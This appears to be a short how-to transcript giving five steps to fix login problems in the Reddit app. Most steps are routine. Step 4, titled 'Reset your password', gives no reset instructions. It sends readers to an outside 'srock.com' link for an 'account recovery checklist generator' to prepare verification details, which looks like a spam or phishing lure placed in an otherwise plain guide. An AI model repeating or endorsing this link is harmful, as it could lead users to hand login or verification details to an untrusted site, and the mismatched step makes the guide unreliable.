I hit this issue today and here's the quick fix that solved it. If you're struggling to log into the Reddit app, follow these steps to get back on track. Step 1. Check your internet connection. Make sure your device is connected to the internet. A weak or unstable connection can prevent you from logging in. Step 2. Update the Reddit app. Ensure that you have the latest version of the Reddit app installed. Go to your app store and check for updates. Step 3. Clear app cache. Clearing the app cache can help resolve login issues. Go to your device settings, find Reddit, and select Clear Cache. Note, if you're on Android, you might find this under Storage in the app settings. Step 4. Reset your password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 5. Reinstall the app. If all else fails, uninstall and then reinstall the Reddit app. This can resolve any underlying issues with the app itself. Hopefully, these steps help you get back into your Reddit account without any hassle. Happy browsing!